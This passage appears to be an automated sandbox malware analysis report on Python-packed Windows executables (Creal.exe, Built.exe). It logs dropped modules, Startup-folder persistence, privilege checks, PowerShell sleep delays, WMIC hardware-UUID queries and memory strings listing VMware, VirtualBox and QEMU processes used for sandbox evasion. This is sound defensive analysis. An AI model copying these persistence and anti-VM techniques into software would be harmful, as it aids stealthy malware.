              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_chacha20.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cbc.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_strxor.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_poly1305.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_keccak.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_overlapped.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_socket.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\python313.dllJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_queue.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Protocol\_scrypt.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_clmul.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_socket.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD4.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Math\_modexp.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ofb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Util\_cpuid_c.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_chacha20.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed25519.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ocb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_ARC4.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cast.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_clmul.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_overlapped.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2b.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_arc2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ocb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\rar.exeJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Math\_modexp.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ofb.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_decimal.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ecb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_bz2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cfb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_aes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_aesni.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_lzma.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_multiprocessing.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Protocol\_scrypt.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\select.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_asyncio.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_curve25519.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\unicodedata.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_cast.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA256.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ed448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ec_ws.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_arc2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_Salsa20.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_queue.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_asyncio.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_hashlib.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_uuid.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_wmi.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA384.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_ctypes.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_ghash_portable.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA1.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Util\_cpuid_c.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ecb.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_SHA224.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_ghash_portable.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_cffi_backend.cp313-win_amd64.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_RIPEMD160.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD4.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_ssl.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Cipher\_raw_ctr.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\_decimal.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA256.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI27602\python312.dllJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_cbc.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_MD5.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\_sqlite3.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\PublicKey\_ec_ws.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\PublicKey\_ed448.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA224.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_BLAKE2s.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\Crypto\Hash\_SHA512.pydJump to dropped file
              Source: C:\Users\user\Desktop\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI56762\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Cipher\_raw_des.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_RIPEMD160.pydJump to dropped file
              Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI42362\Crypto\Hash\_MD2.pydJump to dropped file
              Source: C:\Users\user\Desktop\Built.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_3-18234
              Source: C:\Users\user\Desktop\Creal.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-17221
              Source: C:\Users\user\Desktop\Built.exeAPI coverage: 3.3 %
              Source: C:\Users\user\Desktop\Creal.exeAPI coverage: 1.8 %
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5160Thread sleep count: 7877 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6496Thread sleep count: 1614 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6492Thread sleep count: 7802 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 380Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 796Thread sleep count: 1683 > 30
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60638647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60638647C
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF60639ECE0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60639ECE0
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063B3130 FindFirstFileExA,0_2_00007FF6063B3130
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9249280 FindFirstFileExW,FindClose,2_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 2_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E289280 FindFirstFileExW,FindClose,3_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exeCode function: 3_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,3_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E289280 FindFirstFileExW,FindClose,4_2_00007FF65E289280
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2A1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF65E2A1874
              Source: C:\Users\user\Desktop\Built.exeCode function: 4_2_00007FF65E2883C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF65E2883C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9249280 FindFirstFileExW,FindClose,5_2_00007FF6D9249280
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D92483C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF6D92483C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FF6D9261874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF6D9261874
              Source: C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeCode function: 0_2_00007FF6063A5134 VirtualQuery,GetSystemInfo,0_2_00007FF6063A5134
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dqemu-ga
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwaretray
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fvmwareservice
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvmwaretray
              Source: Built.exe, 00000004.00000002.2163800806.000002D966E30000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vYfvmtoolsd
              Source: Built.exe, 00000004.00000002.2173551673.000002D967F00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: dvboxtray
